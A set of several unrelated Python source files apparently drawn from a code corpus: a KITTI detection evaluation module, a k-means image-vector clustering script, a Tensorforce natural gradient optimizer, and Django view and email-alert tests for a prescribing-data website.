_compose_custom_getters(tf.get_variable_scope().custom_getter,
custom_getter))
def _create_target_modality(modality_dict):
# TODO(trandustin): We require this in order to apply methods utilized
# differently for modalities which are "targets"
# (e.g., modality.target_bottom). In the future, remove need for this
# behavior.
return {k: v for k, v in six.iteritems(modality_dict) if "target" in k}
|
the-stack_106_23791 | # A modification version from chainercv repository.
# (See https://github.com/chainer/chainercv/blob/master/chainercv/evaluations/eval_detection_voc.py)
from __future__ import division
import os
import torch
import logging
import numpy as np
from tqdm import tqdm
import pycocotools.mask as mask_util
from maskrcnn_benchmark.data.datasets.evaluation.kitti.kittieval import KITTIeval
from maskrcnn_benchmark.modeling.roi_heads.mask_head.inference import Masker
from maskrcnn_benchmark.structures.boxlist_ops import boxlist_iou
from maskrcnn_benchmark.data.datasets.evaluation.coco.coco_eval import COCOResults, check_expected_results
def do_kitti_evaluation(
dataset,
predictions,
box_only,
output_folder,
iou_types,
expected_results,
expected_results_sigma_tol,
):
logger = logging.getLogger("maskrcnn_benchmark.inference")
pred_boxlists = []
gt_boxlists = []
for image_id, prediction in enumerate(predictions):
img_info = dataset.get_img_info
if len(prediction) == 0:
continue
image_width = img_info["width"]
image_height = img_info["height"]
prediction = prediction.resize((image_width, image_height))
pred_boxlists.append(prediction)
gt_boxlist = dataset.get_groundtruth(image_id)
gt_boxlists.append(gt_boxlist)
if box_only:
logger.info("Evaluating bbox proposals")
areas = {"all": "", "small": "s", "medium": "m", "large": "l"}
res = COCOResults("box_proposal")
for limit in [100, 1000]:
for area, suffix in areas.items():
stats = evaluate_box_proposals(pred_boxlists, gt_boxlists, area=area, limit=limit)
key = "AR{}@{:d}".format(suffix, limit)
res.results["box_proposal"][key] = stats["ar"].item()
logger.info(res)
check_expected_results(res, expected_results, expected_results_sigma_tol)
if output_folder:
torch.save(res, os.path.join(output_folder, "box_proposals.pth"))
return
kitti_results = {}
kitti_gts = {}
if "bbox" in iou_types:
logger.info("Preparing bbox results")
kitti_results["bbox"] = prepare_for_kitti_detection(pred_boxlists)
kitti_gts["bbox"] = prepare_for_kitti_detection(pred_boxlists)
if "segm" in iou_types:
logger.info("Preparing segm results")
kitti_results["segm"] = prepare_for_kitti_segmentation(pred_boxlists)
kitti_gts["segm"] = prepare_for_kitti_segmentation(pred_boxlists)
#results = COCOResults(*iou_types)
logger.info("Evaluating predictions")
for iou_type in iou_types:
res = evaluate_predictions_on_kitti(kitti_gts, kitti_results, iou_type)
# results.update(res)
# logger.info(results)
#check_expected_results(results, expected_results, expected_results_sigma_tol)
#
#return results
return res
def evaluate_box_proposals(predictions, gt_boxlists, thresholds=None, area="all", limit=None):
"""Evaluate detection proposal recall metrics. This function is a much
faster alternative to the official COCO API recall evaluation code. However,
it produces slightly different results.
"""
# Record max overlap value for each gt box
# Return vector of overlap values
areas = {
"all": 0,
"small": 1,
"medium": 2,
"large": 3,
"96-128": 4,
"128-256": 5,
"256-512": 6,
"512-inf": 7,
}
area_ranges = [
[0 ** 2, 1e5 ** 2], # all
[0 ** 2, 32 ** 2], # small
[32 ** 2, 96 ** 2], # medium
[96 ** 2, 1e5 ** 2], # large
[96 ** 2, 128 ** 2], # 96-128
[128 ** 2, 256 ** 2], # 128-256
[256 ** 2, 512 ** 2], # 256-512
[512 ** 2, 1e5 ** 2],
] # 512-inf
assert area in areas, "Unknown area range: {}".format(area)
area_range = area_ranges[areas[area]]
gt_overlaps = []
num_pos = 0
for image_id, prediction in enumerate(predictions):
gt_boxes = gt_boxlists[image_id]
gt_areas = torch.as_tensor(gt_boxes.area())
valid_gt_inds = (gt_areas >= area_range[0]) & (gt_areas <= area_range[1])
gt_boxes = gt_boxes[valid_gt_inds]
num_pos += len(gt_boxes)
if len(gt_boxes) == 0:
continue
if len(prediction) == 0:
continue
if limit is not None and len(prediction) > limit:
prediction = prediction[:limit]
prediction = prediction.resize(gt_boxes.size)
overlaps = boxlist_iou(prediction, gt_boxes)
_gt_overlaps = torch.zeros(len(gt_boxes))
for j in range(min(len(prediction), len(gt_boxes))):
# find which proposal box maximally covers each gt box
# and get the iou amount of coverage for each gt box
max_overlaps, argmax_overlaps = overlaps.max(dim=0)
# find which gt box is 'best' covered (i.e. 'best' = most iou)
gt_ovr, gt_ind = max_overlaps.max(dim=0)
assert gt_ovr >= 0
# find the proposal box that covers the best covered gt box
box_ind = argmax_overlaps[gt_ind]
# record the iou coverage of this gt box
_gt_overlaps[j] = overlaps[box_ind, gt_ind]
assert _gt_overlaps[j] == gt_ovr
# mark the proposal box and the gt box as used
overlaps[box_ind, :] = -1
overlaps[:, gt_ind] = -1
# append recorded iou coverage level
gt_overlaps.append(_gt_overlaps)
gt_overlaps = torch.cat(gt_overlaps, dim=0)
gt_overlaps, _ = torch.sort(gt_overlaps)
if thresholds is None:
step = 0.05
thresholds = torch.arange(0.5, 0.95 + 1e-5, step, dtype=torch.float32)
recalls = torch.zeros_like(thresholds)
# compute recall for each iou threshold
for i, t in enumerate(thresholds):
recalls[i] = (gt_overlaps >= t).float().sum() / float(num_pos)
# ar = 2 * np.trapz(recalls, thresholds)
ar = recalls.mean()
return {
"ar": ar,
"recalls": recalls,
"thresholds": thresholds,
"gt_overlaps": gt_overlaps,
"num_pos": num_pos,
}
def prepare_for_kitti_detection(pred_boxlists):
kitti_results = []
for image_id, prediction in enumerate(pred_boxlists):
if len(prediction) == 0:
continue
boxes = prediction.bbox.tolist()
areas = [(b[3]-b[1])*(b[2]-b[0]) for b in boxes]
scores = prediction.get_field("scores").tolist()
labels = prediction.get_field("labels").tolist()
kitti_results.extend(
[
{
"image_id": image_id,
"category_id": labels[k],
"bbox": box,
"score": scores[k],
'area': areas[k],
'id': k + 1,
}
for k, box in enumerate(boxes)
]
)
return kitti_results
def prepare_for_kitti_segmentation(pred_boxlists):
masker = Masker(threshold=0.5, padding=1)
coco_results = []
for image_id, prediction in tqdm(enumerate(pred_boxlists)):
if len(prediction) == 0:
continue
masks = prediction.get_field("mask")
areas = masks.sum(-1).sum(-1)
masks = masker(masks.expand(1, -1, -1, -1, -1), prediction)
masks = masks[0]
scores = prediction.get_field("scores").tolist()
labels = prediction.get_field("labels").tolist()
rles = [mask_util.encode(np.array(mask[0, :, :, np.newaxis], order="F"))[0] for mask in masks]
for rle in rles:
rle["counts"] = rle["counts"].decode("utf-8")
coco_results.extend(
[
{
"image_id": image_id,
"category_id": labels[k],
"segmentation": rle,
"score": scores[k],
'area': areas[k],
'id': k+1,
}
for k, rle in enumerate(rles)
]
)
return coco_results
def evaluate_predictions_on_kitti(kitti_gts, kitti_results, iou_type="bbox"):
kitti_eval = KITTIeval(kitti_gts, kitti_results, iou_type)
kitti_eval.evaluate()
kitti_eval.accumulate()
kitti_eval.summarize()
return kitti_eval
|
the-stack_106_23792 | import os
import numpy as np
from sklearn.cluster import KMeans
from sklearn.decomposition import PCA
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
from sklearn.preprocessing import StandardScaler
import pandas as pd
import json
def plot_3d(vector_array, save_plot_dir):
"""
Plot 3D vector features distribution from vector array
:param vector_array: (N x 3) vector array, where N is the number of images
:param save_plot_dir: (string) directory to save plot
:return: save 3D distribution feature to disk
"""
principal_df = pd.DataFrame(data=vector_array, columns=['pc1', 'pc2', 'pc3'])
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
xs = principal_df['pc1']
ys = principal_df['pc2']
zs = principal_df['pc3']
ax.scatter(xs, ys, zs, s=50, alpha=0.6, edgecolors='w')
ax.set_xlabel('pc1')
ax.set_ylabel('pc2')
ax.set_zlabel('pc3')
plt.savefig(save_plot_dir + '/3D_scatter.png')
plt.close()
def plot_2d(vector_array, save_plot_dir):
"""
Plot 2D vector features distribution from vector array
:param vector_array: (N x 2) vector array, where N is the number of images
:param save_plot_dir: (string) directory to save plot
:return: save 2D distribution feature to disk
"""
principal_df = pd.DataFrame(data = vector_array, columns = ['pc1', 'pc2'])
fig = plt.figure()
ax = fig.add_subplot(111)
xs = principal_df['pc1']
ys = principal_df['pc2']
ax.scatter(xs, ys, s=50, alpha=0.6, edgecolors='w')
ax.set_xlabel('pc1')
ax.set_ylabel('pc2')
plt.savefig(save_plot_dir + '/2D_scatter.png')
plt.close()
def read_vector(img_dir):
"""
Read vector in a directory to array (N x D): N is number of vectors, D is vector's dimension
:param img_dir: (string) directory where feature vectors are
:return: (array) N X D array
"""
vector_files = [f for f in os.listdir(img_dir) if f.endswith(".npz")]
vector_array = []
for img in vector_files:
vector = np.loadtxt(os.path.join(img_dir, img))
vector_array.append(vector)
vector_array = np.asarray(vector_array)
return vector_array, vector_files
def find_best_k(vector_array, save_plot_dir, max_k=100):
"""
Find best number of cluster
:param vector_array: (array) N x D dimension feature vector array
:param save_plot_dir: (string) path to save cost figure
:param max_k: (int) maximum number of cluster to analyze
:return: plot the elbow curve to figure out the best number of cluster
"""
cost = []
dim = vector_array.shape[1]
for i in range(1, max_k):
kmeans = KMeans(n_clusters=i, random_state=0)
kmeans.fit(vector_array)
cost.append(kmeans.inertia_)
# plot the cost against K values
plt.plot(range(1, max_k), cost, color='g', linewidth='3')
plt.xlabel("Value of K")
plt.ylabel("Squared Error (Cost)")
plt.savefig(save_plot_dir + '/cost_' + str(dim) + 'D.png')
plt.close()
def k_mean(vector_array, k):
"""
Apply k-mean clustering approach to assign each feature image in vector array to suitable subsets
:param vector_array: (array) N x D dimension feature vector array
:param k: (int) number of cluster
:return: (array) (N x 1) label array
"""
kmeans = KMeans(n_clusters=k, random_state=0)
kmeans.fit(vector_array)
labels = kmeans.labels_
return labels
def reduce_dim_combine(vector_array, dim=2):
"""
Applying dimension reduction to vector_array
:param vector_array: (array) N x D dimension feature vector array
:param dim: (int) desired dimension after reduction
:return: (array) N x dim dimension feature vector array
"""
# Standardizing the features
vector_array = StandardScaler().fit_transform(vector_array)
# Apply PCA first to reduce dim to 50
pca = PCA(n_components=50)
vector_array = pca.fit_transform(vector_array)
# Apply tSNE to reduce dim to #dim
model = TSNE(n_components=dim, random_state=0)
vector_array = model.fit_transform(vector_array)
return vector_array
if __name__ == "__main__":
# Mode: investiagate to find the best k, inference to cluster
# MODE = "investigate"
MODE = "inference"
# Image vectors root dir
img_dir = "results/image_vectors/"
# Final dimension
dim = 2
for object_name in os.listdir(img_dir):
print("Process %s" % object_name)
# object_name = img_dir.split("/")[-1]
vector_array, img_files = read_vector(os.path.join(img_dir, object_name))
# k_mean(vector_array)
if vector_array.shape[0] >= 450:
# Apply dimensional reducing approach
vector_array = reduce_dim_combine(vector_array, dim)
if MODE == "investigate":
# Plot data distribution after reducing dimension
if dim == 2:
plot_2d(vector_array)
save_plot_dir = "visualization/2D/"
elif dim == 3:
plot_3d(vector_array)
save_plot_dir = "visualization/3D/"
else:
raise ValueError("Not support dimension")
# Plot cost chart to find best value of k
find_best_k(vector_array, object_name, save_plot_dir)
continue
# Find label for each image
labels = k_mean(vector_array, k=40).tolist()
assert len(labels) == len(img_files), "Not equal length"
label_dict = [{"img_file": img_files[i].replace(".npz", "").replace(object_name + '_', ""), "label": str(labels[i]), "prob": "1.0"} for i in range(len(labels))]
# Save to disk
label_dir = "results/img_cluster/"
label_outpath = os.path.join(label_dir, object_name + ".json")
# os.makedirs(label_outpath, exist_ok=True)
with open(label_outpath, 'w') as fp:
json.dump({"data": label_dict}, fp) |
the-stack_106_23796 | # Copyright 2018 Tensorforce Team. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import tensorflow as tf
from tensorforce import util
from tensorforce.core import parameter_modules
from tensorforce.core.optimizers import Optimizer
from tensorforce.core.optimizers.solvers import solver_modules
class NaturalGradient(Optimizer):
"""
Natural gradient optimizer.
"""
def __init__(
self, name, learning_rate, cg_max_iterations=20, cg_damping=1e-3, cg_unroll_loop=False,
summary_labels=None
):
"""
Creates a new natural gradient optimizer instance.
Args:
learning_rate: Learning rate, i.e. KL-divergence of distributions between optimization steps.
cg_max_iterations: Conjugate gradient solver max iterations.
cg_damping: Conjugate gradient solver damping factor.
cg_unroll_loop: Unroll conjugate gradient loop if true.
"""
super().__init__(name=name, summary_labels=summary_labels)
self.learning_rate = self.add_module(
name='learning-rate', module=learning_rate, modules=parameter_modules
)
self.solver = self.add_module(
name='conjugate-gradient', module='conjugate_gradient', modules=solver_modules,
max_iterations=cg_max_iterations, damping=cg_damping, unroll_loop=cg_unroll_loop
)
def tf_step(
self, variables, arguments, fn_loss, fn_kl_divergence, return_estimated_improvement=False,
**kwargs
):
"""
Creates the TensorFlow operations for performing an optimization step.
Args:
variables: List of variables to optimize.
arguments: Dict of arguments for callables, like fn_loss.
fn_loss: A callable returning the loss of the current model.
fn_kl_divergence: A callable returning the KL-divergence relative to the current model.
return_estimated_improvement: Returns the estimated improvement resulting from the
natural gradient calculation if true.
**kwargs: Additional arguments, not used.
Returns:
List of delta tensors corresponding to the updates for each optimized variable.
"""
# Optimize: argmin(w) loss(w + delta) such that kldiv(P(w) || P(w + delta)) = learning_rate
# For more details, see our blogpost:
# https://reinforce.io/blog/end-to-end-computation-graphs-for-reinforcement-learning/
arguments = util.fmap(function=tf.stop_gradient, xs=arguments)
# Calculates the product x * F of a given vector x with the fisher matrix F.
# Incorporating the product prevents having to calculate the entire matrix explicitly.
def fisher_matrix_product(deltas):
# Gradient is not propagated through solver.
deltas = [tf.stop_gradient(input=delta) for delta in deltas]
# kldiv
kldiv = fn_kl_divergence(**arguments)
# grad(kldiv)
kldiv_gradients = [
tf.convert_to_tensor(value=grad) for grad in tf.gradients(ys=kldiv, xs=variables)
]
# delta' * grad(kldiv)
delta_kldiv_gradients = tf.add_n(inputs=[
tf.reduce_sum(input_tensor=(delta * grad))
for delta, grad in zip(deltas, kldiv_gradients)
])
# [delta' * F] = grad(delta' * grad(kldiv))
return [
tf.convert_to_tensor(value=grad)
for grad in tf.gradients(ys=delta_kldiv_gradients, xs=variables)
]
# loss
loss = fn_loss(**arguments)
# grad(loss)
loss_gradients = tf.gradients(ys=loss, xs=variables)
# Solve the following system for delta' via the conjugate gradient solver.
# [delta' * F] * delta' = -grad(loss)
# --> delta' (= lambda * delta)
deltas = self.solver.solve(
fn_x=fisher_matrix_product, x_init=None, b=[-grad for grad in loss_gradients]
)
# delta' * F
delta_fisher_matrix_product = fisher_matrix_product(deltas=deltas)
# c' = 0.5 * delta' * F * delta' (= lambda * c)
# TODO: Why constant and hence KL-divergence sometimes negative?
half = tf.constant(value=0.5, dtype=util.tf_dtype(dtype='float'))
constant = half * tf.add_n(inputs=[
tf.reduce_sum(input_tensor=(delta_F * delta))
for delta_F, delta in zip(delta_fisher_matrix_product, deltas)
])
learning_rate = self.learning_rate.value()
# Zero step if constant <= 0
def no_step():
zero_deltas = [tf.zeros_like(tensor=delta) for delta in deltas]
if return_estimated_improvement:
return zero_deltas, tf.constant(value=0.0, dtype=util.tf_dtype(dtype='float'))
else:
return zero_deltas
# Natural gradient step if constant > 0
def apply_step():
# lambda = sqrt(c' / c)
lagrange_multiplier = tf.sqrt(x=(constant / learning_rate))
# delta = delta' / lambda
estimated_deltas = [delta / lagrange_multiplier for delta in deltas]
# improvement = grad(loss) * delta (= loss_new - loss_old)
estimated_improvement = tf.add_n(inputs=[
tf.reduce_sum(input_tensor=(grad * delta))
for grad, delta in zip(loss_gradients, estimated_deltas)
])
# Apply natural gradient improvement.
applied = self.apply_step(variables=variables, deltas=estimated_deltas)
with tf.control_dependencies(control_inputs=(applied,)):
# Trivial operation to enforce control dependency
estimated_delta = [
util.identity_operation(x=estimated_delta)
for estimated_delta in estimated_deltas
]
if return_estimated_improvement:
return estimated_delta, estimated_improvement
else:
return estimated_delta
# Natural gradient step only works if constant > 0
skip_step = constant > tf.constant(value=0.0, dtype=util.tf_dtype(dtype='float'))
return self.cond(pred=skip_step, true_fn=no_step, false_fn=apply_step)
|
the-stack_106_23797 | import re
from urlparse import parse_qs, urlparse
from pyquery import PyQuery as pq
from django.conf import settings
from django.core import mail
from django.test import TransactionTestCase
from frontend.models import EmailMessage
from frontend.models import OrgBookmark
from frontend.models import SearchBookmark
from allauth.account.models import EmailAddress
class TestAlertViews(TransactionTestCase):
fixtures = ['chemicals', 'sections', 'ccgs',
'practices', 'prescriptions', 'measures']
def _post_org_signup(self, entity_id, email='[email protected]'):
form_data = {'email': email}
if len(entity_id) == 3:
url = "/ccg/%s/" % entity_id
form_data['pct'] = entity_id
else:
url = "/practice/%s/" % entity_id
form_data['practice'] = entity_id
return self.client.post(
url, form_data, follow=True)
def _post_search_signup(self, url, name, email='[email protected]'):
form_data = {'email': email}
form_data['url'] = url
form_data['name'] = name
return self.client.post(
'/analyse/', form_data, follow=True)
def _create_user_and_login(self, email, is_superuser=False):
from allauth.utils import get_user_model
user = get_user_model().objects.create(
username=email, email=email, is_active=True)
user.set_unusable_password()
if is_superuser:
user.is_superuser = True
user.save()
EmailAddress.objects.create(user=user,
email=email,
primary=True,
verified=True)
self.client.force_login(
user, 'django.contrib.auth.backends.ModelBackend')
return user
def test_search_email_invalid(self):
response = self._post_search_signup('stuff', 'mysearch', email='boo')
self.assertContains(
response, "Please enter a valid email address")
def test_search_email_sent(self):
response = self._post_search_signup('stuff', 'mysearch')
self.assertContains(
response, "Check your email and click the confirmation link")
self.assertEqual(len(mail.outbox), 1)
self.assertIn("about mysearch", mail.outbox[0].body)
def test_search_email_copy_kept(self):
self._post_search_signup('stuff', 'mysearch')
msg = EmailMessage.objects.first()
self.assertIn("about mysearch", msg.message.body)
self.assertIn("[email protected]", msg.to)
def test_search_bookmark_created(self):
self.assertEqual(SearchBookmark.objects.count(), 0)
self._post_search_signup('stuff', '%7Emysearch')
self.assertEqual(SearchBookmark.objects.count(), 1)
bookmark = SearchBookmark.objects.last()
self.assertEqual(bookmark.url, 'stuff')
# Check the name is URL-decoded
self.assertEqual(bookmark.name, '~mysearch')
# But it's not approved (until they log in)
self.assertFalse(bookmark.approved)
def test_search_follow_email_link(self):
self._post_search_signup('stuff', 'mysearch')
confirm_url = re.match(r".*http://.*(/accounts/confirm-email/.*?)\s",
mail.outbox[0].body, re.DOTALL).groups()[0]
response = self.client.get(confirm_url, follow=True)
self.assertTemplateUsed(response, 'analyse.html')
self.assertContains(
response, "subscribed to monthly alerts about <em>mysearch</em>")
self.assertTrue(response.context['user'].is_active)
# The act of logging in approves bookmarks
bookmark = SearchBookmark.objects.last()
self.assertTrue(bookmark.approved)
def test_ccg_email_invalid(self):
response = self._post_org_signup('03V', email='boo')
self.assertContains(
response, "Please enter a valid email address")
def test_ccg_email_sent(self):
email = '[email protected]'
response = self._post_org_signup('03V', email=email)
self.assertTrue(response.context['user'].is_anonymous())
self.assertContains(
response, "Check your email and click the confirmation link")
self.assertEqual(len(mail.outbox), 1)
self.assertIn(email, mail.outbox[0].to)
self.assertIn("about prescribing in NHS Corby", mail.outbox[0].body)
def test_ccg_bookmark_added_when_already_logged_in(self):
email = '[email protected]'
self._create_user_and_login(email)
response = self._post_org_signup('03V', email=email)
self.assertEqual(response.context['user'].email, email)
self.assertTemplateUsed(response, 'measures_for_one_ccg.html')
self.assertContains(response, "Thanks, you're now subscribed")
self.assertEqual(len(mail.outbox), 0)
self.assertEqual(OrgBookmark.objects.count(), 1)
self.assertTrue(OrgBookmark.objects.last().approved)
def test_bookmark_added_by_other_user_is_unapproved(self):
# Create user A
user_a = self._create_user_and_login('[email protected]')
# Create user B
self._create_user_and_login('[email protected]')
# Now user B should not be able to sign up user A to anything
self._post_org_signup('03V', email='[email protected]')
created_bookmark = OrgBookmark.objects.last()
# Note that user A has had a bookmark created (there's nothing
# to stop anyone signing anyone else up....)
self.assertTrue(created_bookmark.user.email, '[email protected]')
# And they should have an email
self.assertIn('[email protected]', mail.outbox[0].to)
# ...but it's an unapproved bookmark...
self.assertFalse(created_bookmark.approved)
# ...and user A must reconfirm their identity
self.assertFalse(user_a.emailaddress_set.first().verified)
def test_ccg_bookmark_added_for_new_user_when_already_logged_in(self):
self._create_user_and_login('[email protected]')
response = self._post_org_signup('03V', email='[email protected]')
self.assertTrue(response.context['user'].is_anonymous())
confirm_url = re.match(r".*http://.*(/accounts/confirm-email/.*?)\s",
mail.outbox[0].body, re.DOTALL).groups()[0]
response = self.client.get(confirm_url, follow=True)
self.assertEqual(response.context['user'].email, '[email protected]')
def test_ccg_bookmark_created(self):
self.assertEqual(OrgBookmark.objects.count(), 0)
self._post_org_signup('03V')
self.assertEqual(OrgBookmark.objects.count(), 1)
bookmark = OrgBookmark.objects.last()
self.assertEqual(bookmark.pct.code, '03V')
def test_ccg_follow_email_link(self):
self._post_org_signup('03V', '[email protected]')
confirm_url = re.match(r".*http://.*(/accounts/confirm-email/.*?)\s",
mail.outbox[0].body, re.DOTALL).groups()[0]
response = self.client.get(confirm_url, follow=True)
self.assertEqual(response.context['user'].email, '[email protected]')
self.assertContains(
response, "subscribed to monthly alerts about "
"<em>prescribing in NHS Corby")
self.assertTrue(response.context['user'].is_active)
def test_practice_email_invalid(self):
response = self._post_org_signup('P87629', email='boo')
self.assertContains(
response, "Please enter a valid email address")
def test_practice_email_sent(self):
response = self._post_org_signup('P87629')
self.assertContains(
response, "Check your email and click the confirmation link")
self.assertEqual(len(mail.outbox), 1)
self.assertIn("about prescribing in 1/ST Andrews", mail.outbox[0].body)
def test_practice_bookmark_created(self):
self.assertEqual(OrgBookmark.objects.count(), 0)
self._post_org_signup('P87629')
self.assertEqual(OrgBookmark.objects.count(), 1)
bookmark = OrgBookmark.objects.last()
self.assertEqual(bookmark.practice.code, 'P87629')
def test_practice_follow_email_link(self):
self._post_org_signup('P87629')
confirm_url = re.match(r".*http://.*(/accounts/confirm-email/.*?)\s",
mail.outbox[0].body, re.DOTALL).groups()[0]
response = self.client.get(confirm_url, follow=True)
self.assertContains(
response, "subscribed to monthly alerts about "
"<em>prescribing in 1/ST Andrews")
self.assertTrue(response.context['user'].is_active)
class TestFrontendViews(TransactionTestCase):
fixtures = ['chemicals', 'sections', 'ccgs',
'practices', 'prescriptions', 'measures', 'importlog']
def test_call_view_homepage(self):
response = self.client.get('')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'index.html')
def test_javascript_inclusion(self):
with self.settings(DEBUG=False):
response = self.client.get('')
doc = pq(response.content)
mainjs = doc('script')[-2].attrib['src']
self.assertIn('openprescribing.min.js', mainjs)
with self.settings(DEBUG=True, INTERNAL_IPS=('127.0.0.1',)):
response = self.client.get('')
doc = pq(response.content)
mainjs = doc('script')[-2].attrib['src']
self.assertIn('openprescribing.js', mainjs)
def test_call_view_analyse(self):
response = self.client.get('/analyse/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'analyse.html')
self.assertNotContains(response, "Preview alert email")
def test_call_view_bnf_all(self):
response = self.client.get('/bnf/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'all_bnf.html')
self.assertContains(response, '<h1>All BNF sections</h1>')
doc = pq(response.content)
sections = doc('#all-results li')
self.assertEqual(len(sections), 5)
first_section = doc('#all-results li:first')
self.assertEqual(first_section.text(), '2: Cardiovascular System')
def test_call_view_bnf_chapter(self):
response = self.client.get('/bnf/02/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'bnf_section.html')
doc = pq(response.content)
title = doc('h1')
self.assertEqual(title.text(), '2: Cardiovascular System')
subsections = doc('a.subsection')
self.assertEqual(len(subsections), 2)
def test_call_view_bnf_section(self):
response = self.client.get('/bnf/0202/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'bnf_section.html')
doc = pq(response.content)
title = doc('h1')
self.assertEqual(title.text(), '2.2: Diuretics')
lead = doc('.lead')
self.assertEqual(
lead.text(), 'Part of chapter 2 Cardiovascular System')
subsections = doc('a.subsection')
self.assertEqual(len(subsections), 1)
def test_call_view_bnf_para(self):
response = self.client.get('/bnf/020201/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'bnf_section.html')
doc = pq(response.content)
title = doc('h1')
self.assertEqual(
title.text(), '2.2.1: Thiazides And Related Diuretics')
lead = doc('.lead')
self.assertEqual(
lead.text(),
'Part of chapter 2 Cardiovascular System , section 2.2 Diuretics')
subsections = doc('a.subsection')
self.assertEqual(len(subsections), 0)
def test_call_view_chemical_all(self):
response = self.client.get('/chemical/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'all_chemicals.html')
self.assertContains(response, '<h1>All chemicals</h1>')
doc = pq(response.content)
title = doc('h1')
self.assertEqual(title.text(), 'All chemicals')
sections = doc('#all-results li')
self.assertEqual(len(sections), 4)
first_section = doc('#all-results li:first')
self.assertEqual(first_section.text(),
'Bendroflumethiazide (0202010B0)')
def test_call_view_chemical_section(self):
response = self.client.get('/chemical/0202010D0/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'chemical.html')
doc = pq(response.content)
title = doc('h1')
self.assertEqual(title.text(), 'Chlorothiazide (0202010D0)')
lead = doc('.lead')
self.assertEqual(
lead.text(),
('Part of chapter 2 Cardiovascular System , section 2.2 '
'Diuretics , paragraph 2.2.1 Thiazides And Related Diuretics')
)
def test_call_view_ccg_all(self):
response = self.client.get('/ccg/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'all_ccgs.html')
doc = pq(response.content)
title = doc('h1')
self.assertEqual(title.text(), 'All CCGs')
ccgs = doc('a.ccg')
self.assertEqual(len(ccgs), 2)
def test_call_view_ccg_section(self):
response = self.client.get('/ccg/03V/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'measures_for_one_ccg.html')
doc = pq(response.content)
title = doc('h1')
self.assertEqual(title.text(), 'CCG: NHS Corby')
practices = doc('#practices li')
self.assertEqual(len(practices), 1)
def test_call_single_measure_for_ccg(self):
response = self.client.get('/measure/cerazette/ccg/03V/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'measure_for_one_ccg.html')
def test_call_view_practice_all(self):
response = self.client.get('/practice/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'all_practices.html')
doc = pq(response.content)
title = doc('h1')
self.assertEqual(title.text(), 'Find a practice')
practices = doc('#all-results a.practice')
self.assertEqual(len(practices), 0)
def test_call_view_practice_section(self):
response = self.client.get('/practice/P87629/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'measures_for_one_practice.html')
doc = pq(response.content)
title = doc('h1')
self.assertEqual(title.text(), '1/ST ANDREWS MEDICAL PRACTICE')
lead = doc('#intro p:first')
self.assertEqual(
lead.text(),
('Address: ST.ANDREWS MEDICAL CENTRE, 30 RUSSELL STREET '
'ECCLES, MANCHESTER, M30 0NU'))
lead = doc('.lead:last')
def test_call_single_measure_for_practice(self):
response = self.client.get('/measure/cerazette/practice/P87629/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'measure_for_one_practice.html')
def test_call_view_measure_ccg(self):
response = self.client.get('/ccg/03V/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'measures_for_one_ccg.html')
doc = pq(response.content)
title = doc('h1')
self.assertEqual(title.text(), 'CCG: NHS Corby')
practices = doc('#practices li')
self.assertEqual(len(practices), 1)
def test_call_view_measure_practice(self):
response = self.client.get('/practice/P87629/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'measures_for_one_practice.html')
doc = pq(response.content)
title = doc('h1')
self.assertEqual(title.text(), '1/ST ANDREWS MEDICAL PRACTICE')
def test_call_view_measure_practices_in_ccg(self):
response = self.client.get('/ccg/03V/cerazette/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'measure_for_practices_in_ccg.html')
doc = pq(response.content)
title = doc('h1')
t = ('Cerazette vs. Desogestrel by GP practices '
'in NHS Corby')
self.assertEqual(title.text(), t)
def test_call_view_practice_redirect(self):
response = self.client.get('/practice/P87629/measures/')
self.assertEqual(response.status_code, 301)
def test_call_view_ccg_redirect(self):
response = self.client.get('/ccg/03V/measures/')
self.assertEqual(response.status_code, 301)
def test_all_measures(self):
response = self.client.get('/measure/')
self.assertContains(response, 'Cerazette')
def test_all_measures_with_tag_filter(self):
response = self.client.get('/measure/?tags=frob')
self.assertNotContains(response, 'Cerazette')
self.assertContains(response, 'This list is filtered')
def test_gdoc_inclusion(self):
for doc_id in settings.GDOC_DOCS.keys():
response = self.client.get("/docs/%s/" % doc_id)
self.assertEqual(response.status_code, 200)
def test_tariff(self):
response = self.client.get('/tariff/ABCD/')
self.assertContains(response, 'Tariff')
self.assertContains(response, 'bnfCodes = "ABCD"')
class TestPPUViews(TransactionTestCase):
fixtures = ['ccgs', 'importlog', 'dmdproducts',
'practices', 'prescriptions', 'presentations']
def test_practice_price_per_unit(self):
response = self.client.get('/practice/P87629/price_per_unit/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['entity'].code, 'P87629')
def test_ccg_price_per_unit(self):
response = self.client.get('/ccg/03V/price_per_unit/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['entity'].code, '03V')
self.assertEqual(response.context['date'].strftime('%Y-%m-%d'),
'2014-11-01')
def test_price_per_unit_histogram_with_ccg(self):
response = self.client.get('/ccg/03V/0202010F0AAAAAA/price_per_unit/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['highlight_name'], 'NHS Corby')
self.assertEqual(response.context['date'].strftime('%Y-%m-%d'),
'2014-11-01')
